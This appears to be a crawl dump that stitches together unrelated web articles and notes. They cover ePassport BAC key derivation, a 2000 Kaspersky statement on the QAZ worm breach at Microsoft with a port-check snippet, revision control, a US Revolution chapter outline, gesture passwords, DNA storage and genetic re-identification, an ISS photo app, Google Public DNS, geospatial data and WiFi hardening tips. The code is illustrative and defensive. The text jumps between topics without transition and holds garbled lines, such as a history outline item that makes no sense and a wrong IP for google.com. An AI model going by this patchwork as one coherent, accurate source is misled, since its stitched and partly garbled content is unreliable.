According to a recent report, 93 of 193 U.N. member states now issue biometric ePassports to citizens. The U.S. remains the largest issuer, with more than 72 million documents issued to citizens thus far. The second in line is the U.K., with more than 27 million issued to date. In fact, Europe issues the most ePassports per region, with Italy, France, Spain, the Netherlands and Germany being the leaders.
Currently, we are in a transitional period as governments slowly migrate from first-generation basic access control (BAC) ePassports to the second generation, which supports extended access control (EAC). While BAC ePassports provide countless benefits, especially over legacy passports, the second-generation passport takes these advantages a step further. This migration can be attributed to the greater control EAC gives passport holders over who is allowed to access the personal information stored in the document. While BAC is secure, EAC takes that security to a second, more advanced level for those who wish to use it.
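For readers curious how BAC works at the protocol level, here is a rough sketch of its key-derivation step as commonly described in ICAO Doc 9303: an inspection system that has optically read the passport's machine-readable zone (MRZ) derives the chip-access keys from it, proving it has physically seen the document. The sample MRZ string and the omission of DES parity adjustment are simplifications of mine; treat this as an outline, not a conformant implementation.

```python
import hashlib

def bac_keys(mrz_info: str):
    """Derive BAC access keys from MRZ data (simplified sketch).

    mrz_info concatenates the document number, date of birth and date
    of expiry, each followed by its check digit.  The key seed is the
    first 16 bytes of SHA-1 over that string; distinct 32-bit counters
    then yield the encryption and MAC keys.  Real implementations also
    adjust DES parity bits, omitted here for brevity.
    """
    k_seed = hashlib.sha1(mrz_info.encode("ascii")).digest()[:16]

    def derive(counter: int) -> bytes:
        return hashlib.sha1(k_seed + counter.to_bytes(4, "big")).digest()[:16]

    return derive(1), derive(2)   # (K_enc, K_mac)

# Illustrative MRZ information: document number, birth date and expiry
# date, each with its check digit.
k_enc, k_mac = bac_keys("L898902C<369080619406236")
```

Because the keys depend only on printed data, BAC proves physical possession of the open document; EAC layers chip-side authentication and finer-grained access control on top of this.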
EAC passports come equipped with the most advanced security features available to date, including iris recognition, fingerprint verification and advanced cryptography. The second-generation ePassport is constructed with chip-cloning prevention and releases biometric information only to trusted sources. This improved international verification method also includes a stronger, 128-bit data transfer encryption feature.
The sensitivity of such biometric data is a major concern for those looking to make the switch from first- to second-generation ePassports. This is because biometric data is non-revocable personally identifiable information (PII). Through the use of a public key infrastructure (PKI), EAC ePassports help protect individuals’ unique biometric data from theft or misuse, ensuring only authorized entities can access the data stored in the document.
Kaspersky Lab Int. comments on the recent virus incident
Cambridge, UK, October 28, 2000 - As disclosed on Friday, the corporate network of Microsoft, the world's largest software developer, was attacked by unknown hackers. The hackers used the QAZ network worm to penetrate into the network. As a result, the hackers gained access to the resources in which Microsoft stores the source code of its products, and may have copied some of them illegally.
Kaspersky Lab Int. presumes that at the moment there is little evidence to support the claim that Russian hackers from St. Petersburg performed the hacking. This scenario was introduced because the data from Microsoft's internal network was transferred to an e-mail address in Russia's northern capital. However, it is a well-known fact that the location of an e-mail box is not necessarily the same as the location of its owner. The e-mail address in St. Petersburg could be owned by anyone, from any country around the world. It could even have been used deliberately to mislead the official investigation; the crime's actual origin has yet to be discovered.
More important is the fact that the hacking was performed using the QAZ network worm. This worm was originally discovered earlier this year in July, and Kaspersky Lab has received several reports of this worm in the wild. Protection against the QAZ worm was immediately added to AntiViral Toolkit Pro (AVP) and other major anti-virus products' databases. This raises the question: how did Microsoft's security systems miss the worm and make penetration possible? An enterprise's security policy should ensure that anti-virus protection is under the full control of highly qualified network administrators. It is therefore hard to believe that a workstation had no anti-virus software installed or that it had not been updated for a long time. It is more likely that a user had intentionally or accidentally disabled the anti-virus protection and allowed the worm to infect the computer.
More surprising still, even if the worm had penetrated the Microsoft network, the hackers should not have been able to reach the worm's backdoor component from outside. Attempts to do so should have been blocked immediately by a firewall that prevents data transfer on certain communication ports, including the port used by the QAZ worm. In other words, hackers should not be able to control the malicious code from outside the network. Hence it appears that it is impossible to steal anything (including source code) from Microsoft's internal network using the QAZ worm, even if the hackers know passwords and login information.
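A simple way an administrator might audit a machine for such a backdoor is to probe the relevant TCP port. The snippet below is a generic illustration; the port number 7597 is an assumption on my part, based on contemporary write-ups of QAZ, and is not taken from this article.

```python
import socket

def is_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Assumed backdoor port for QAZ, per contemporary reports; verify locally.
QAZ_PORT = 7597

if is_port_open("127.0.0.1", QAZ_PORT):
    print("WARNING: something is listening on the suspected backdoor port")
```

A perimeter firewall that simply refuses inbound connections on such ports would, as the article argues, have made the backdoor unreachable from outside regardless of what ran inside.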
Kaspersky Lab has no reason to question the competence of Microsoft's network administrators; it is easy to accidentally overlook a port that is commonly used by malicious programs.
Despite the recent incident, Kaspersky Lab does not agree with the sharp criticism aimed at Microsoft's security systems. It should not be forgotten that Microsoft has one of the largest internal networks in the world. The fact that this is its first serious incident of hacking over recent years only proves that Microsoft is actually doing very well. In fact, many other big corporations have been hacked successfully more often than Microsoft.
Besides, there is still no proof that the hacking was carried out from outside; it may instead have come from within the company. In other words, the problem may lie not with Microsoft's security systems, but with Microsoft's security in general.
"Once again, we would like to draw users' attention to the fact that the installation of anti-virus software cannot be considered the only requirement for comprehensive anti-virus protection. The problem is complex and far reaching, it comes in direct contact with other security aspects and is an essential part of enterprise security in general," said Denis Zenkin, Head of Corporate Communications for Kaspersky Lab.
The technical description of the QAZ worm is available at Kaspersky's Virus Encyclopedia.
Revision control manages changes to a set of data over time. These changes can be structured in various ways.
Often the data is thought of as a collection of many individual items, such as files or documents, and changes to individual files are tracked. This accords with intuitions about separate files, but causes problems when identity changes, such as during renaming, splitting, or merging of files. Accordingly, some systems, such as git, instead consider changes to the data as a whole, which is less intuitive for simple changes, but simplifies more complex changes.
When data that is under revision control is modified, after being retrieved by checking out, this is not in general immediately reflected in the revision control system (in the repository), but must instead be checked in or committed. A copy outside revision control is known as a "working copy". As a simple example, when editing a computer file, the data stored in memory by the editing program is the working copy, which is committed by saving. Concretely, one may print out a document, edit it by hand, and only later manually input the changes into a computer and save it. For source code control, the working copy is instead a copy of all files in a particular revision, generally stored locally on the developer's computer; in this case saving the file only changes the working copy, and checking in to the repository is a separate step.
If multiple people are working on a single data set or document, they are implicitly creating branches of the data (in their working copies), and thus issues of merging arise, as discussed below. For simple collaborative document editing, this can be prevented by using file locking or simply avoiding working on the same document that someone else is working on.
Revision control systems are often centralized, with a single authoritative data store, the repository, and check-outs and check-ins done with reference to this central repository. Alternatively, in distributed revision control, no single repository is authoritative, and data can be checked out and checked in to any repository. When checking in to a different repository, this is interpreted as a merge or patch. | <urn:uuid:318f0828-a093-4079-b96d-b457ea4c81dd> | CC-MAIN-2017-04 | http://sozluk.cozumpark.com/goster.aspx?id=2402&kelime=working-copy | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00221-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935423 | 436 | 3.578125 | 4 |
Johnny R. Phillips 10-17-2016 Chapter 6 outline
The Revolution within:
Abigail Adams born in Massachusetts in 1744
The dream of equality:
1.The Revolution unleashed public debates and political and social struggles that enlarged the scope of freedom and challenged inherited structures of power within America.
2.The Declaration of Independence’s assertion that “all men are created equal” announced a radical principle whose full implications could not be anticipated.
Expanding the political nation:
1.the democratization of freedom was dramatic for free men.
2.Artisans, small farmers, laborers, and militia all emerged as self-conscious elements in politics
The revolution in Pennsylvania:
1.The prewar elite of Pennsylvania was dramatic for free men.
2.Pennsylvania’s 1776 constitution sought to institutionalize democracy in a number of ways, including
1.Establishing an annually elected, one-house legislature
2.Allowing tax-paying men to vote
3.Abolishing the office of governor
1.Each state wrote a new constitution, and all agreed that their governments must be republics.
2.One-house legislatures were adopted only by Pennsylvania, Georgia, and Vermont.
3.John Adams’s “balanced governments” included two-house legislatures.
The right to vote:
1.The property qualification for suffrage was hotly debated.
2.The least democratization occurred in the southern states, where highly deferential political tradition enabled the landed gentry to retain their control of political affairs.
3.By the 1780s, with the exception of Virginia, Maryland, and New York, a large majority of the adult white male population could meet voting requirements.
Toward religious toleration
Joining forces with France and inviting Quebec to join in the struggle against Britain had weakened anti-Catholicism.
Separating church and state:
1.The drive to separate church and state brought together Deists with members of evangelical sects.
2.Many states still limited religious freedom
3.Catholics gained the right to worship without persecution throughout the state
Jefferson and Religious Liberty:
1.Thomas Jefferson’s bill for establishing religious freedom separated church and state.
2.Thanks to religious freedom, the early republic witnessed an amazing proliferation of religious denominations.
3.DEFINING ECONOMIC FREEDOM
Toward free labor:
By the 1800s, indentured servitude had all but disappeared from the United States.
The soul of a republic:
To most free Americans, equality meant equal opportunity rather than equality of condition.
The politics of inflation:
Some Americans responded to wartime inflation by accusing merchants of hoarding goods and by seizing stocks of food to be sold at the traditional “just price”
The debate over free trade:
1.Congress urged states to adopt measures to fix wages and prices.
2.Adam Smith’s argument that the “invisible hand” of the market directed economic life more effectively and fairly than government.
4.THE LIMITS OF LIBERTY
The limits of Liberty:
An estimated 20 to 25 percent of Americans were Loyalists.
The Loyalists’ Plight:
1.The war for Independence was in some respect a civil war among Americans.
2.When the war ended, as many as 100,000 Loyalists were banished from the United States or emigrated voluntarily.
The Indian Revolution:
1.American independence meant the loss of freedom for Indians.
Slavery and the revolution:
The irony that Americans cried for Liberty while enslaving Africans.
Obstacles to Abolition:
Some patriots argued that slavery for blacks made freedom possible for whites
The cause of general Liberty:
1.By defining freedom as a universal entitlement rather than as a set of rights specific to a particular place or people, the Revolution inevitably raised questions about the status of slavery in the new nation.
2.Samuel Sewall’s The Selling of Joseph (1700) was the first antislavery tract in America
3.In 1773, Benjamin Rush warned that slavery was a “national crime” that would bring “national Punishment”
Petitions for Freedom;
1.Slaves in the north and in the South appropriated the language of liberty for their own purposes.
2.Slaves presented “freedom petitions” in New England in the early 1770s.
1.Nearly 100,000 slaves deserted their owners and fled to British lines.
2.At the end of the war, over 15,000 blacks accompanied the British out of the country.
Abolition in the North:
Between 1777 and 1804, every state north of Maryland took steps toward emancipation.
Free black communities:
After the war, free black communities with their own churches, schools, and leaders came into existence.
The researchers say free form gestures could be more secure than passwords or “connect-the-dots” grid features.
Researchers from Rutgers School of Engineering in the US are exploring whether or not free form gestures could be used as a secure password.
A study by the researchers found that free-form gestures (sweeping fingers in shapes across the screen of a smartphone or tablet) can replace passwords to unlock phones and access apps.
The researchers say free-form gestures could be more secure than passwords or "connect-the-dots" grid patterns, as the latter can be easily memorized by ‘shoulder surfers’ who spy on users.
According to the researchers, free-form gestures can be more complex than grid-based gestures because users create them without following a template.
Rutgers School of Engineering’s Department of Electrical and Computer Engineering assistant professor and one of the leaders of the project, Janne Lindqvist, said: "All it takes to steal a password is a quick eye."
"With all the personal and transactional information we have on our phones today, improved mobile security is becoming increasingly critical," Lindqvist added.
In order to assess the practicality of the method, researchers from Rutgers, together with collaborators from the Max Planck Institute for Informatics, including Antti Oulasvirta, and the University of Helsinki, studied free-form gestures for access authentication.
During the study, the researchers applied a generate-test-retest paradigm where 63 participants were asked to draw a gesture, recall it, and recall it again 10 days later.
A recogniser system designed by the researchers captured the gestures and based on the data they tested the memorability of the gestures and found that the gestures can be used as passwords.
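The article does not describe the recognizer's internals. A common approach in simple gesture recognizers (the "$1" family, for example) is to resample each stroke to a fixed number of points and compare templates point by point; the sketch below illustrates that idea, with the point count and any acceptance threshold invented for illustration:

```python
import math

def resample(stroke, n=16):
    """Resample a stroke to n points spaced evenly along its arc length."""
    pts = [tuple(p) for p in stroke]
    total = sum(math.dist(a, b) for a, b in zip(pts, pts[1:]))
    interval = total / (n - 1)
    out, acc, i = [pts[0]], 0.0, 1
    while i < len(pts):
        d = math.dist(pts[i - 1], pts[i])
        if acc + d >= interval and d > 0:
            # Interpolate a new point exactly `interval` along the path.
            t = (interval - acc) / d
            q = (pts[i - 1][0] + t * (pts[i][0] - pts[i - 1][0]),
                 pts[i - 1][1] + t * (pts[i][1] - pts[i - 1][1]))
            out.append(q)
            pts.insert(i, q)   # continue measuring from the new point
            acc = 0.0
        else:
            acc += d
        i += 1
    while len(out) < n:        # guard against floating-point shortfall
        out.append(pts[-1])
    return out[:n]

def gesture_distance(a, b, n=16):
    """Mean point-to-point distance between two resampled gestures."""
    return sum(math.dist(p, q)
               for p, q in zip(resample(a, n), resample(b, n))) / n
```

A login attempt would then be accepted when `gesture_distance(attempt, enrolled_template)` falls below a calibrated threshold.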
"You can create any shape, using any number of fingers, and in any size or location on the screen," Lindqvist said.
"We saw that this security protection option was clearly missing in the scientific literature and also in practice, so we decided to test its potential."
The researchers are now testing their preliminary findings further to determine whether the approach can be used at a wider scale, as it appears to be a better way to prevent password breaches.
The findings will be published in June at MobiSys ’14, an international conference on mobile computing.
We’ve looked at police bees vs DNA hackers before, and how freaky future weaponized viruses and zero-day exploits may aim to infect your brain. Well there are lots of cool and creepy things happening in the area of DNA again. From biological 'hard drives,' to exploiting a vulnerability to expose identities of supposedly anonymous genetic donors—and people in their family tree that never donated DNA, to Homeland Security discussing potentially launching a “social conditioning campaign” so people won’t freak out about plans to develop and deploy rapid DNA analyzers.
A single gram of DNA could store enough data to fill 468,000 DVDs
Picture something as tiny as a “speck of dust” that can store a text file containing the entire collection of Shakespeare's 154 sonnets, a 26 second MP3 from Martin Luther King Jr.'s "I have a dream" speech, a PDF of the first research paper describing the double helical nature of DNA by James Watson and Francis Crick, as well as JPG photo from the European Bioinformatics Institute (EMBL-EBI). Since DNA strands about the size of a dust speck stored all that, Emily Leproust of Agilent Technologies said that a cupful of DNA could hold “a hundred million hours of high-definition video.” Researchers in the United Kingdom told Nature that they improved upon the DNA encoding scheme and raised storage density to 2.2 petabytes per gram, which is three times better than the last effort.
A team led by molecular biologists Nick Goldman and Ewan Birney of the European Bioinformatics Institute, with help from Agilent Technologies, also added an error correction scheme so the data could be read back with 100% accuracy. To put the storage density another way, a single gram of DNA could store what we can currently fit on 468,000 DVDs, about 2.2 million gigabytes of data. If stored in a cool and dry place, DNA can be stable for thousands of years. According to the EBI researchers, DNA data storage is now only cost-effective for data that needs to be archived for 600 years or more. “But if the costs of DNA synthesis—currently the most expensive part of the enterprise—drop 100-fold, that break-even number would drop to about 50 years.” However such DNA as biological hard drive storage could prove invaluable for institutions like the Large Hadron Collider since it creates about 15 petabytes of data per year.
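The figures quoted above are easy to sanity-check, assuming decimal petabytes and 4.7 GB single-layer DVDs:

```python
# Back-of-the-envelope check of the quoted DNA storage density.
PETABYTE = 10**15                 # bytes (decimal, as storage vendors count)
DVD = 4.7 * 10**9                 # bytes per single-layer DVD

bytes_per_gram = 2.2 * PETABYTE   # ~2.2 PB per gram of DNA
dvds_per_gram = bytes_per_gram / DVD
gigabytes_per_gram = bytes_per_gram / 10**9

print(round(dvds_per_gram))       # ~468,000 DVDs per gram
print(gigabytes_per_gram)         # ~2.2 million gigabytes per gram
```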
From DNA slick tricks to scarier DNA news: Hacking privacy of 'anonymous' donors
You may be used to hearing about vulnerabilities leading to security and privacy breaches, but in a new twist, scientists exploited vulnerabilities in the security of genetic data posted online from supposedly anonymous donors. “Using only a computer, an Internet connection, and publicly accessible online resources, a team of Whitehead Institute researchers has been able to identify nearly 50 individuals who had submitted personal genetic material as participants in genomic studies.” Not only that, but they were able to find their entire families, even though the relatives had not donated DNA. The scientists published the results of their research in Science magazine.
Whitehead Fellow Yaniv Erlich used to work as a white hat hacker, pen testing for vulnerabilities in banks, but this time, using public databases, he searched out an easily found type of DNA pattern on the Y chromosome that is passed from father to son; it “looks like stutters among billions of chemical letters in human DNA.” Since “there is a strong link in men between their surname and unique markings on the male, or Y, chromosome,” Erlich took the Y chromosome's short “stutters” and then searched a genealogy database for men with those same repeating DNA patterns. That gave him the surnames of the paternal and maternal grandfather. A quick Google search for those people turned up an obituary, which then gave him the family tree.
Melissa Gymrek, a member of Erlich’s team, explained, “We show that if, for example, your Uncle Dave submitted his DNA to a genetic genealogy database, you could be identified. In fact, even your fourth cousin Patrick, whom you’ve never met, could identify you if his DNA is in the database, as long as he is paternally related to you.”
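The matching step can be illustrated with a toy lookup. Everything below is made up: real Y-STR profiles span dozens of markers, and real genealogy matching is statistical rather than a simple mismatch count.

```python
# Hypothetical database mapping Y-STR repeat counts to surnames.
genealogy_db = {
    (13, 24, 14, 11): "Smith",     # repeat counts at four invented markers
    (12, 23, 15, 10): "Garcia",
}

def infer_surname(y_profile, db, max_mismatches=1):
    """Return the surname whose Y-STR signature best matches the donor's,
    tolerating a small number of mutations between relatives."""
    for profile, surname in db.items():
        mismatches = sum(a != b for a, b in zip(profile, y_profile))
        if mismatches <= max_mismatches:
            return surname
    return None

print(infer_surname((13, 24, 14, 11), genealogy_db))   # Smith (exact match)
print(infer_surname((13, 24, 14, 12), genealogy_db))   # Smith (one mutation)
print(infer_surname((9, 9, 9, 9), genealogy_db))       # None (no match)
```

A recovered surname plus public records (obituaries, family trees) is what closes the loop on identity, as described above.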
Erlich said, “This is an important result that points out the potential for breaches of privacy in genomic studies. Our aim is to better illuminate the current status of identifiability of genetic data. More knowledge empowers participants to weigh the risk and benefits and make more informed decisions when considering whether to share their own data.” He added, “We also hope that this study will eventually result in better security algorithms, better policy guidelines, and better legislation to help mitigate some of the risks.”
During a Science Magazine podcast, Gymrek pointed out one of the scarier risks of what could be done with this data. “So the big example that comes to mind is something like insurance companies. If insurance companies can know who you are, know your DNA sequence, they can determine if you’re predisposed to certain disorders, and they can use that information against you to raise your premiums and to make your life bad. You can think of scenarios like that where these are people that you don’t want getting a hold of your genetic data that might be able to get a hold of it.”
Eric D. Green, director of the National Human Genome Research Institute at the National Institutes of Health, said, "We are in what I call an awareness moment." Dr. Amy L. McGuire, an attorney and ethicist at Baylor College of Medicine said, "To have the illusion you can fully protect privacy or make data anonymous is no longer a sustainable position." Mildred Cho of the Stanford University's Center for Integration of Research on Genetics and Ethics added, "Nobody can promise privacy." Basically, if your DNA is public, then so are you and your family.
DHS plans for Rapid DNA Analyzers
Why else could this be potentially dangerous for you? Because, as the EFF explained in an unrelated bit of scary DNA news, Rapid DNA analyzers that can “process DNA in 90 minutes or less” are “coming soon to a police department or immigration office near you.” Rapid DNA Analyzers are “about the size of a laser printer” and “are designed to be used in the field by non-scientists.” Manufacturers are telling the U.S. government the devices “will soon revolutionize the use of DNA by making it a routine identification and investigational tool.” Documents from the US Citizenship and Immigration Services (USCIS) and DHS’s Science & Technology show that funds have been earmarked “to develop a Rapid DNA analyzer that can verify familial relationships for refugee and asylum applications for as little as $100.”
The EFF added:
DHS and USCIS acknowledge that “DNA collection may create controversy.” One USCIS employee advocated for “DHS, with the help of expert public relation professionals,” to “launch a social conditioning campaign” to “dispel the myths and promote the benefits of DNA technology.” Another document feared that “If DHS fails to provide an adequate response to [inquiries about its Rapid DNA Test Program] quickly, civil rights/civil liberties organizations may attempt to shut down the test program." | <urn:uuid:2ce55cc6-4b7b-4f3f-aa98-cd07a9f1d88b> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2474257/emerging-technology/researchers-exploit-flaw-to-identify-anonymous-dna-donors-and-their-families.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00276-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947945 | 1,566 | 2.5625 | 3 |
When the astronauts who pieced together the International Space Station snapped photos of the view from the cosmos, little did they know that there would eventually be an app for that.
On the 15th anniversary of the ISS, a recently-departed NASA program manager noted that a winner of the agency’s recent "hackathon," which she managed, designed an iPad tool for timing the best extraterrestrial shots.
Terrestrial photogs can use the same app to frame the astronauts.
The concept was "we’re going to alert you and we’re going to alert the astronauts on station 10 minutes before the flyover, so you can wave, and they can wave, and it coordinates a photo between the two," Ali Llewellyn, former NASA Open Innovation Program Office community manager, said during an interview on the sidelines of a conference hosted by Nextgov.
The T-10 app (pronounced T minus 10) lets astronauts choose the area they want to photograph, pick whether they want a day or night shot, and set an alarm to go off when the location is visible. They receive a ten-minute warning before the flyover. When the alarm sounds, they say "yes" to proceed with the countdown, and a message alerts T-10 iOS and Android device users on Earth to smile for the camera.
The Earthlings also get a 10-minute warning so they can grab telescopes and cameras to find a good angle. The astronaut's countdown screen displays the number of people ready to pose.
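The countdown logic amounts to scheduling an alarm ten minutes before the next predicted pass. A minimal sketch (the real app presumably derives pass times from ISS orbital data rather than taking them as given):

```python
from datetime import datetime, timedelta

WARNING = timedelta(minutes=10)   # the "T minus 10" lead time

def seconds_until_alert(next_pass, now):
    """Seconds to wait before firing the ten-minute warning,
    clamped to zero if the warning window has already started."""
    alert_at = next_pass - WARNING
    return max((alert_at - now).total_seconds(), 0.0)

now = datetime(2013, 11, 20, 12, 0, 0)
next_pass = datetime(2013, 11, 20, 12, 25, 0)    # flyover in 25 minutes
print(seconds_until_alert(next_pass, now))        # 900.0 -> alarm in 15 min
```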
During an 83-hour brainstorming session this spring, citizens and astronauts in 44 countries "online and beyond" collaborated to solve specific NASA problems using public data sources, like space station positions.
Still, the ISS is probably more inventive than the app.
The space station "stands as one of the engineering marvels of this or any other age, and a testament to American ingenuity and perseverance," House Science Committee Ranking Member Rep. Eddie Bernice Johnson, D-Texas, said in a statement. “NASA should be proud of having built a robust facility for testing life support systems and other technologies to ensure they work in space and are reliable.” | <urn:uuid:543eb1d4-ffd8-482e-a13c-363262ff1854> | CC-MAIN-2017-04 | http://www.nextgov.com/mobile/2013/11/say-cheese-and-happy-birthday-international-space-station/74231/?oref=ng-flyin | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00304-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934425 | 447 | 2.578125 | 3 |
Google Public DNS, Google's own free Domain Name System, is an attempt to make Web pages load faster at a time when millions of users are accessing the Web several times a day, triggering multiple DNS requests and bogging down the Web page rendering process. Google says Google Public DNS focuses on improving DNS speed, security and the validity of results. Read on to find out how it works and what information Google stores.
In its latest effort to accelerate the rate at which Web pages load for users, Google on Dec. 3 launched its own free Domain Name System, Google Public DNS, into a crowded market that already includes several providers.
DNS is basically a hierarchical naming system for computers or any resource connected to the Internet. However, because it is not something the average Web user sees on the surface, it helps to think of the DNS as a sort of phone book for the Internet, because it translates computer host names into IP addresses. Prem Ramaswami, product manager for Google Public DNS, explained: "Most of us aren't familiar with DNS because it's often handled automatically by our Internet Service Provider (ISP), but it provides an essential function for the Web. You could think of it as the switchboard of the Internet, converting easy-to-remember domain names-e.g., www.google.com-into the unique Internet Protocol (IP) numbers-e.g., 18.104.22.168-that computers use to communicate with one another."
Google Public DNS is the company's stab at making Web pages load faster at a time when millions of users are accessing the Web several times a day, triggering multiple DNS requests. This can bog down the Web page rendering process, which means users are sitting at their computers, waiting to view Web pages.
Ramaswami told eWEEK that Google Public DNS is focused on improving DNS speed, security and the validity of results. He explained how it works: when a user loads a Web page, that triggers a DNS query to the ISP, which in turn has to go out across the Web to get the correct answer. For example, when a user searches for mail.google.com, his or her ISP's resolver will ask the dot-com servers where Google.com's name server is, then ask Google.com's server what the IP address is for mail.google.com, and return that to the Web user.
This process takes longer, Ramaswami noted, because the DNS has to crawl the Web and ask several servers to get the correct answer. Google Public DNS issues DNS queries constantly, regardless of whether people have queried the DNS, which means Google always has the answer in its cache. Each answer comes with a "time to live" (TTL); before that limit of, say, 300 seconds expires, Google will re-ask the question for a big range of domain names.
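The caching-and-prefetching behavior Ramaswami describes can be sketched as follows. This is a toy resolver, not Google's implementation; the refresh margin and data structures are invented for illustration.

```python
import time

class PrefetchingResolver:
    """Toy DNS cache that re-queries names shortly before their TTL expires,
    so popular answers are always warm in the cache."""

    def __init__(self, upstream_lookup):
        self.upstream = upstream_lookup      # name -> (ip, ttl_seconds)
        self.cache = {}                      # name -> (ip, expires_at)

    def resolve(self, name, now=None):
        now = time.time() if now is None else now
        hit = self.cache.get(name)
        if hit and hit[1] > now:
            return hit[0]                    # answered from cache: fast path
        ip, ttl = self.upstream(name)
        self.cache[name] = (ip, now + ttl)
        return ip

    def prefetch(self, names, now=None, margin=30):
        """Re-ask upstream for names whose TTL is about to run out."""
        now = time.time() if now is None else now
        for name in names:
            hit = self.cache.get(name)
            if hit is None or hit[1] - now < margin:
                ip, ttl = self.upstream(name)
                self.cache[name] = (ip, now + ttl)

# Demo with a fake upstream that records how often it is actually queried.
queries = []
def fake_upstream(name):
    queries.append(name)
    return ("18.104.22.168", 300)            # IP from the article, 300 s TTL

r = PrefetchingResolver(fake_upstream)
r.resolve("mail.google.com", now=0)          # miss: asks upstream
r.resolve("mail.google.com", now=100)        # hit: cache still valid
r.prefetch(["mail.google.com"], now=280)     # 20 s left < margin: refreshed
r.resolve("mail.google.com", now=400)        # hit again thanks to prefetch
assert len(queries) == 2
```

Clients see the fast cached path on every lookup, while the upstream work happens in the background, which is the point of Google's constant re-querying.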
Geospatial intelligence is ingrained in our daily lives. We use map apps on our smart phones, companies use location-based beacon technology to target consumers, we use geo-tags with social media and we depend on a vast network of precision logistics to keep our lights on, our vehicles driving, our packages delivered and our cupboards stocked. The mechanism that supports all of these endeavors is rooted in the realization and virtualization of big data. If we needed an umbrella under which we would hang these concepts, we’d call it the Internet of Things – an amorphous framework that encompasses both legacy and leading edge technologies, big data, the literal Internet, and users spanning from industrial machines to the average consumer with a smart phone.
Despite the obvious need for geospatial data within this IoT framework, industries have found calculating the value of that data to be a complex practice. Industries that once stood alone and operated in silos have become interconnected by sheer necessity – collecting, analyzing, sharing and even selling data. It is no longer acceptable for companies supporting critical infrastructures to track basic data. They must gather data from all facets of operations and information technologies, analyze that data, and turn it into actionable intelligence. The value of data today truly exceeds its numerical quantity.
Geospatial Data and the Internet of Things
Geospatial data is the key to unlocking some of the critical functions that developers and end-users require to effectively empower the Internet of Things. Navigation functions on a cell phone? Geospatial data. Restaurant or entertainment recommendations in a specific area? Geospatial data. City bus route coordination? Geospatial data. Most often, we see the end result of geospatial data virtualization, but what we don’t see is just how many people touch that data to even get it to the point of deployable information.
This Data Value Chain has changed the way people and groups of people interact in our daily lives, as a whole, both internally and externally. The industries affected by geospatial data use it in innovative ways – from the collection on the ground – to analytics in the back office. It drives decision-making, project management, business intelligence, and increases productivity by streamlining workflows. These industries are directly responsible for building and maintaining the critical infrastructure upon which cities – and countries – are built and maintained. With each iteration of geospatial data along the chain, the value of that data increases.
Blended Technologies Drive a Data Value Chain
The Data Value Chain is a framework in which people can view the flow of geospatial data from the instant it is collected throughout its entire lifecycle. Each vertical industry has its own flow (and needs) of data, but eventually, that data intersects with analytics engines that can turn individual points of information into all different kinds of actionable intelligence. The Data Value Chain depends on a blended technology ecosystem that acts as disruptive force throughout the global marketplace to root out traditional, static practices and supplant them with innovative, purpose-built solutions based on data analytics.
Technology is simply a means to an end. The focus should not be on the newest tools. Rather, it is more important to know what users need in order to accomplish peak business intelligence. To do this, we first must understand how people work. Who are they, and what is their role in a project or enterprise? What information do they need? Where and how do they use it? And what is the end result?
The answers to these questions often illustrate how people use multiple types of data that come from different sources at different times. End users often need to combine and analyze the data to derive its value. Only when we understand these processes can we ask the next question: How can we use technology to gather and analyze data that will make their work easier?
The solution often lies in a technological ecosystem—a synergistic combination of core technologies to gather and manage data combined with software and tools for processing, analysis and delivery. Technological ecosystems built around geospatial information derived from big data support the needs of, and actions for, large portions of an organization.
The use of integrated or blended technologies is one of the most important trends in the geospatial and IoT arena. By combining multiple technologies, integrated solutions provide new ways to work and reduce costs, accelerate schedules and supply high-value deliverables along the value chain. And even though many geospatial practitioners are deeply interested in integrated technology, their clients may not share that passion. As long as information is complete, accurate and usable, the people using it may have little interest in how it got to them. That’s a key point to keep in mind.
It seems that every day we see new combinations of technologies that are producing ever-larger volumes of data. That trend will continue. But these systems can only deliver data. The value of the data is not realized until it is converted to information and put to work, which brings us to the need for a holistic, purpose-built data value chain across an enterprise.
The implicit value of geospatial data belongs to the 21st century workforce awash in data virtualization and the impending boom of IoT technology: from the boots on the ground mapping geographic terrain and gathering data in urban and rural settings, to engineers and project managers turning that data into knowledge and developing creative solutions for difficult infrastructural dilemmas; and even to the back-office decision makers tasked with solving the problems of today with an eye on the obstacles of tomorrow. The intersection of blended technologies, the growth of critical geospatial data collection, and the accompanying virtualization of that data have pushed IoT innovation to new heights. As we allow these industries and applications to flourish, the possibilities for a connected future are increasingly tangible.
Ron Bisio joined Trimble in 1996 and has held several marketing, sales, and general management positions prior to taking over worldwide responsibility in 2015 as Vice President of Trimble Geospatial. He holds a Master of Business Administration from the University of Denver; a Master of Regional Planning from the University of Massachusetts; and an undergraduate degree in Geographic Information Systems & Cartography from Salem State University in Salem, Massachusetts.
Subscribe to Data Informed for the latest information and news on big data and analytics for the enterprise, plus get instant access to more than 20 eBooks. | <urn:uuid:1dfc5b5c-5d0c-4237-a629-492915bf73a2> | CC-MAIN-2017-04 | http://data-informed.com/when-big-data-iot-and-geospatial-technology-collide/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00332-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927872 | 1,297 | 2.65625 | 3 |
Wireless networks (aka WiFi) are in pretty much every home out there. What most people aren’t aware of is how easy it is to inadvertently open them up to unauthorized access. By incorrectly configuring your wireless router you risk exposing your personal information, and having your internet service leveraged for illegal activities.
There are steps that can be taken to ensure that your home WiFi network is secure, such as:
- Change the default admin username and password: All routers have a default password, and almost all of these passwords can be obtained by a simple internet search. Change the router’s username and password before making any other changes.
- Disable WPS or WiFi Protected Setup: WPS is a less-secure way to connect to a WiFi network, and can be easier to crack. This can be disabled by logging into your router.
- Change the WiFi SSID: The SSID is the name of your WiFi network. Change it to something unique that is not associated to you or your family.
- Choose a strong encryption method: Do not leave your WiFi network unsecured or “open”. Select a strong encryption such as “WPA” or “WPA2”. DO NOT USE “WEP” encryption.
